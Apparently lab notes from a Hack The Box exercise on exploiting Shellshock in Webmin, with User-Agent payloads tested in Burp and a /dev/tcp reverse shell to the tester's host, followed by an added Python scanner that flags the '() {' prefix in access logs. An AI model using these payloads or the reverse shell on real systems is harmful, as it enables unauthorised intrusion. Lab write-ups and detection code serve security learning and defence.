Port 10000 Webmin
Webmin uses CGI files and is vulnerable to Shellshock, e.g. Beep on HTB.
From the Webmin login panel, initiate a login request and intercept it in Burp. Forward it to Repeater.
Now change the User-Agent header to a Shellshock string and try the following payloads.
() { :; };/bin/echo heloo
() { :; }; sleep 10 (this did work, so it is some kind of blind Shellshock)
Now check with a ping:
() { :; };ping -c 1 10.10.14.108
On our machine:
sudo tcpdump -i tun0 -v
And we get the ping, so let's try a reverse shell.
sh -i >& /dev/tcp/10.10.14.108/9001 0>&1
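Seen from the defending side, every payload above carries the same marker in a request header: the bash function-definition prefix "() {". The following is an added example, not part of the original notes, that scans access-log lines for that prefix in the request line, Referer or User-Agent. It assumes the server or a fronting proxy writes Combined Log Format; the function name and the sample lines are constructed for illustration.

```python
import re

# Shellshock trigger: a header value that opens a bash function definition, "() {".
# Whitespace between the tokens varies, so it is matched loosely.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Assumed format (Combined Log Format):
# ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

def find_shellshock(lines):
    """Return one finding per log line whose request, Referer or User-Agent
    contains a bash function-definition prefix."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not an access-log line in the assumed format
        for field in ("request", "referer", "agent"):
            value = match.group(field)
            if SHELLSHOCK_RE.search(value):
                findings.append({"line": number, "ip": match.group("ip"),
                                 "field": field, "value": value})
                break  # one finding per line is enough for triage
    return findings

# Constructed sample lines (documentation addresses), not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /session_login.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "POST /session_login.cgi HTTP/1.1" 200 512 "-" "() { :; }; sleep 10"',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "POST /session_login.cgi HTTP/1.1" 200 512 "() { :;}; /bin/echo test" "curl/8.0"',
    'malformed line that the parser skips',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} {hit['field']}: {hit['value']}")
```

A hit only shows that the string was sent; whether it executed depends on the Bash version behind the CGI handler, so pair the alert with a patch-level check on the host.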